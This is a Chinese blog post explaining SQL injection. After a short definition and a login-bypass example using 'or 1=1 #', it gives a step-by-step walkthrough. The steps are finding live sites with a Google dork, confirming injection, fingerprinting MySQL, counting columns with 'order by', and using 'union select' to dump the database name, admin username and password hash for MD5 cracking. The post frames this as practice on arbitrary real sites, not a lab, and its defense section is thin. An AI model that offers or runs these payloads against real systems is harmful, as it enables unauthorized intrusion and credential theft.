简述SQL注入

最新推荐文章于 2024-04-21 21:36:18 发布
最新推荐文章于 2024-04-21 21:36:18 发布
阅读量411 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42486616/article/details/103008710
版权

SQL注入

当web应用向后台数据库传递SQL语句进行数据库操作时,如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,来达到获取或修改数据库中的数据。

SQL注入漏洞两个关键条件

  1. 用户能够控制输入的内容
  2. web应用能够把用户输入的内容带到数据库中执行。
    能快捷键

SQL注入分类

1.根据SQL注入点的反馈类型可以分为以下常见几类:

  1. union类型的SQL注入
  2. 基于错误显示的SQL注入
  3. 布尔类型的SQL注入
  4. 基于视觉的SQL注入
  5. 其他类型的SQL注入

攻击原理

正常登陆name框中填写root,pwd为123 上面sql_sel = " select * from app01_test where name=’{0}’ and pwd=’{1}’ 就相当于select * from app01_test where name=root and pwd=123 进行查询
但是
如果name框中填写root or 1=1 #,pwd 随便输入
上面sql_sel = " select * from app01_test where name=’{0}’ and pwd=’{1}’
就相当于select * from app01_test where name=root or 1=1 # and pwd=123 进行查询
这里的#相当于把后面的所有查询包括password查询给注释,并且 or 1 = 1的查询永远是正确的,所以sql攻击注入就完成了
通过这样的方式就绕过了密码检查
所以设计SQL语句时不建议这样设计,或者对特殊字符 #、or、and 等做特殊处理

演练

1、打开VPN,谷歌搜索注入
谷歌搜索小技巧:筛选关键字:“inurl:php?id=”,一搜就出来一大堆,至于有没有呢,那还得一个一个试。

2、判断是否存在sql注入可能。在帖子地址后面空上一格,敲入 and 1=1 ,然后 and 1=2 。这两句什么意思呢? 一个恒等式,一个恒不等式,敲入 and 1=1 帖子返回正常, and 1=2 时帖子返回出错,说明sql语句被执行,程序没有对敏感字符进行过滤。现在我们可以确定此处是一个SQL注入点,程序对带入的参数没有做任何处理,直接带到数据库的查询语句中。可以推断出在访问
http://www.xxxxx.tk/news/read.php?id=50
时数据库中执行的SQL语句大概是这样的:
Select * from [表名] where id=50
添加and 1=1后的SQL语句:
Select * from [表名] where id=50 and 1=1
由于条件and 1=1永远为真,所以返回的页面和正常页面是一致的
添加and 1=2后的SQL语句:
Select * from [表名] where id=50 and 1=2
由于条件1=2永远为假,所以返回的页面和正常页面不一致
3、爆数据库。确定注入点仅仅意味着开始。现在,我们回到原先的帖子地址:
http://www.xxxxx*.tk/news/read.php?id=50
现在要判断数据库类型以及版本,构造语句如下:
http://www.xxxxx.tk/news/read.php?id=50 and ord(mid(version(),1,1))>51
发现返回正常页面,说明数据库是mysql,并且版本大于4.0,支持union查询,反之是4.0
以下版本或者其他类型数据库。
4、爆字段。接着我们再构造如下语句来猜表中字段:

  1. http://www.xxxxx.tk/news/read.php?id=50 order by 10
    返回错误页面,说明字段小于10
  2. http://www.xxxxx.tk/news/read.php?id=50 order by 5
    返回正常页面,说明字段介于5和10之间
  3. http://www.xxxxx.tk/news/read.php?id=50 order by 7
    返回错误页面,说明字段大于5小于7,可以判断字段数是6.下面我们再来确认一下
  4. http://www.xxxxx.tk/news/read.php?id=50 order by 6
    返回正常页面,说明字段确实是6这里采用了“二分查找法”,这样可以减少判断次数,节省时间。

5、爆表.确定字段之后现在我们要构造联合查询语句(union select ),语句如下:
http://www.xxxxx.tk/news/read.php?id=50 and 1=2 union select 1,2,3,4,5,6
我们来看帖子页面,原先内容没有了,取而代之的是返回给了我们 三个数字,分别是3,5,6 我们随便选择一个,这里的3,5,6指的是我们可以把联合查询的对应位置替换为 我们想要查询的关键字,比如版本,数据库名称,主要是用来探测web系统的信息。
6、爆用户名、密码。我们选择3 吧,OK,现在把3给替换掉,先查询下数据库库名,构造语句如下
http://www.xxxxx.tk/news/read.php?id=50 and 1=2 union select 1,2,database(),4,5,6
浏览器给我们返回了 xinwen 。说明这个网站 的数据库库名是 xinwen .
http://www.xxxxx.tk/news/read.php?id=50 and 1=2 union select 1,2,username,4,5,6 from admin
返回 admin
http://www.xxxxx.tk/news/read.php?id=50 and 1=2 union select 1,2,password,4,5,6 from admin
返回 B2E5B76793EDA747382E81391AA3A400
看到这里,是不是觉得密码怪怪的,肯定是加密过后的啦,MD5解密后就得到想要的了。

防止SQL注入

1、数据库权限控制,只给访问数据库的web应用功能所需的最低权限帐户。
2、自定义错误信息,首先我们要屏蔽服务器的详细错误信息传到客户端。
3、把危险的和不必要的存储过程删除
4、关键字过滤
5、专业的SQL注入工具及防毒软件

小白发帖,大佬勿喷。。。。

weixin_42486616
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入简介
不怕死的假老练
09-04 420
一、sql注入概述 SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 二、sql注入原理 sql注入需要满足两个条件 ...
简述各种SQL注入攻防.docx 》
12-23
### SQL注入攻防知识点概述 #### 一、输入验证的重要性及技术详解 ##### 1. 输入验证的基础概念 - **输入定义**:在计算机程序中,输入是指在编译之后程序运行过程中所接收的所有外部数据。对于Web应用程序而言,...
sql注入简述
陌茗228.的博客
03-28 311
什么是sql注入? 所谓SQL注入,就是通过把SQL命令插入到 Web表单提交 或 URL 或 页面请求等的查询字符串中,最终达到欺骗服务器执行恶意的SQL命令。 SQL注入漏洞的本质是把用户输入的数据当做代码来执行 SQL的注释符号为–后跟一个空格,因为在网页的URL中注释符中的空格会被舍去,因此使用–+来表示注释,+号会被URL编码后变成空格。 常见SQL注入的类型: 联合查询注入 报错注入 布尔盲注 时间盲注 宽字节注入 联合查询 如何判断可以联合查询注入 UNION连续的几个查询的字段数一
sql注入实践简述(上)
小灰灰的博客
09-28 318
sql注入实践简述
SQL注入过程简述
Walter的专栏
07-31 1551
1、利用明小子工具判断是否存在SQL注入漏洞或者利用1=1或1=2  或 ' and '1'='1 或' and '1'='2来判定带参数URL是否存在注入漏洞 2、如果存在注入漏洞,则判断数据库名和表名 明小子工具利用工具判断数据库类型然后手工或者自动进行下面的判断 判断表名:.asp?ID=2355 and (Select count(*) from Admin)>0 修改颜色部分直
简述各种SQL注入攻防.docx
05-07
SQL注入是一种常见的网络安全威胁,它发生在web应用程序未能充分验证用户输入的数据时,导致攻击者能够注入恶意SQL代码,从而操纵数据库、获取敏感信息甚至控制整个系统。本文将深入探讨SQL注入攻击及其防御策略。 ...
六个建议防止SQL注入式攻击.pdf
04-06
#### SQL注入攻击简述及原理 SQL注入攻击是一种常见的网络安全威胁,尤其在Web应用中极为普遍。这种攻击利用了程序未能妥善处理用户输入这一弱点,允许攻击者向应用程序发送恶意SQL代码,从而控制数据库服务器执行...
SQL+JAVA学生成绩管理系统+文档
11-05
Spring框架可以提供依赖注入和事务管理,提升代码的可维护性和安全性。此外,Hibernate或MyBatis这样的ORM(对象关系映射)工具可以简化数据库操作,使JAVA代码更专注于业务逻辑,而非底层SQL语法。 在...
简述mybatis大于小于的转义
09-01
在MyBatis的XML映射文件中,我们需要正确地转义特殊字符,以避免解析错误或SQL注入等问题。本文将详细阐述在MyBatis中如何处理大于(>)和小于(<)的转义,并介绍XML中的常见转义字符。 首先,让我们关注问题的...
什么是sql注入?如何防止sql注入
梦里不知身是客
02-17 5188
sql注入:利用现有应用程序,将(恶意)的SQL命令注入到后台数据库执行一些恶意的操作造成SQL注入的原因是因为程序没有有效过滤用户的输入,使攻击者成功的向服务器提交恶意的SQL查询代码,程序在接收后错误的将攻击者的输入作为查询语句的一部分执行,导致原始的查询逻辑被改变,额外的执行了攻击者精心构造的恶意代码防止策略 1.严格限制Web应用的数据库的操作权限,给此用户提供仅仅能够满足其工作的最低权限
SQL 注入总结(详细)
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
01-21 6063
这篇文章是最近学习 SQL 注入后的笔记,里面整理了 SQL 常见的注入方式,供大家学习了解 SQL 注入的原理及方法,也方便后续自己回顾,如有什么错误的地方欢迎指出!
什么是SQL注入
Ping_Pig的博客
07-10 542
本文纯属以个人的角度去看待SQL注入,有些地方不足,请各位读者指点批评 什么sql注入,为什么会发生sql注入,sql注入的危害,怎样预防sql注入 什么是sql注入: sql注入(注入结构化查询语言) 所谓SQL注入,就是通过把SQL命令插入到Web表单中[此处涉及到sql注入的点]提交最终达到欺骗服务器执行恶意的SQL命令。 具体来说,它是利用现有的web应用程序,将(恶意的)SQL...
SQL注入漏洞详解
最新发布
weixin_44756468的博客
04-21 1512
差异备份数据库得到webshell。在sqlserver里dbo和sa权限都有备份数据库权限,我们可以把数据库备份称asp文件,这样我们就可以通过mssqlserver的备份数据库功能生成一个网页小马。
SQL注入漏洞简介、原理及防护
热门推荐
m0_54899775的博客
03-21 1万+
SQL注入漏洞简介、原理及防护 SQL注入原理 SQL注入 SQL注入危害 SQL注入分类 SQL注入防护
SQL注入检测,必备什么条件,求内网渗透测试工具与相关知识,求高手解答.谢谢
Fish77738的专栏
05-22 807
SQL注入检测,必备什么条件,求内网渗透测试工具与相关知识,求高手解答.谢谢 熟练掌握各种内网渗透测试工具与相关知识,精通常见安全攻防技术:sql注入、xss、文件上传、文件包含、命令执行等漏洞 熟悉linux、unix、Windows、oracle、J2EE等各种环境下WEB的安全配置与安全检查及WEB漏洞防范; 熟悉各种脚本语言(asp,php,jsp,java,net、perl、py
sql注入之必备的基础知识
thesiege的博客
12-06 526
什么是SQL注入(SQL Injection)所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。在某些表单中,用户输入的内容直接用来构造(或者影响)动态SQL命令,或作为存储过程的输入参数,这类表单特别容易受到SQL注入式攻击。 mysql常用注释# --[空格]或者是--+ /*…*/ 在注意过程中,这些注释可能都需要进行u
SQL注入必备知识初级
地址ch3nye.top
02-26 6445
初学SQL注入的小白,整理一下必备的一些知识,数据库查询语句和一些PHP函数。 大部分来自W3school,详细内容请自行查询。 首先SQL语句对大小写不敏感,这也导致了后台程序对大小写的检测失效。 SQL 注释语句 ("--"与"/*...*/") (1)--:表示单行注释 (2)/*…*/:用于多行(块)注释 SELECT 查询语句 SQL SELE...
sql注入准备知识
gg的博客
03-22 225
sql注入准备知识 这篇文章会介绍一些sql注入的准备知识,都是基于mysql数据库的 sql语言是什么: 一种功能极强的关系数据库标准语言,不需要定义如何访问数据库,只需要告诉数据库要做什么 sql语言的主要功能 : 查询 操纵 定义 控制 常用的sql注入中的函数: 基本数据库信息 @@version 和 version() 查询数据库的版本信息 user() 查询用户名 curr...
简述sql注入攻击的原理
09-18
SQL注入攻击利用了应用程序对用户输入数据的不当处理,通过在用户输入中插入恶意的SQL代码,从而达到执行恶意操作的目的。攻击者在注入点处插入特定的SQL代码,从而改变原始的SQL查询语句的逻辑,使其执行恶意操作,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值